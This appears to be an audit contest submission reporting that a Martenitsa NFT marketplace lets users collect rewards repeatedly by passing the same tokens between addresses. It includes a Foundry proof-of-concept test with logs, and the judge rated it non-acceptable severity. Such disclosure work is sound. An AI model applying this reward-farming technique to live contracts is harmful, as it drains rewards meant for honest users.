Submission Details
Severity:
Users can earn more reward via transfer NFT Tokens
Summary
If users own some NFT Tokens, users can collect some HT as one rewards. Users can earn lots of rewards via transferring(makePresent) his/her NFT Tokens.
Vulnerability Details
In MartenitsaMarketplace::collectReward(), users can collect some rewards based on the amount of NFT tokens he/she owns. Users can call makePresent() to make use of multiple address to collect more rewards.
Poc
function testCollectMoreRewards() public {
address alice = makeAddr("Alice");
address cathy = makeAddr("Cathy");
vm.startPrank(chasy);
martenitsaToken.createMartenitsa("bracelet");
martenitsaToken.createMartenitsa("bracelet");
martenitsaToken.createMartenitsa("bracelet");
console.log("chasy NFT Token amount: ", martenitsaToken.getCountMartenitsaTokensOwner(chasy));
martenitsaToken.approve(address(marketplace), 0);
martenitsaToken.approve(address(marketplace), 1);
martenitsaToken.approve(address(marketplace), 2);
marketplace.makePresent(alice, 0);
marketplace.makePresent(alice, 1);
marketplace.makePresent(alice, 2);
vm.stopPrank();
vm.startPrank(alice);
marketplace.collectReward();
console.log("Alice's health token amount: ", healthToken.balanceOf(alice));
martenitsaToken.approve(address(marketplace), 0);
martenitsaToken.approve(address(marketplace), 1);
martenitsaToken.approve(address(marketplace), 2);
marketplace.makePresent(cathy, 0);
marketplace.makePresent(cathy, 1);
marketplace.makePresent(cathy, 2);
vm.stopPrank();
vm.startPrank(cathy);
marketplace.collectReward();
console.log("Cathy's health token amount: ", healthToken.balanceOf(cathy));
vm.stopPrank();
}
The output logs are as below:
Logs:
chasy NFT Token amount: 3
Alice's health token amount: 1000000000000000000
Cathy's health token amount: 1000000000000000000
From the log, we can see we collect more rewards than expected via testCollectMoreRewards()
Impact
Users can collect more rewards than expected.
Tools Used
Manual & Foundry
Recommendations
Updates
Lead Judging Commences
bube about 1 year ago
Submission Judgement Published Reason: Non-acceptable severity
Assigned finding tags:
Multiple addresses
Rewards breakdown
nSLOC
239This contest has a flat reward structure with the following payouts:
100 EXP
20 EXP
2 EXP
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.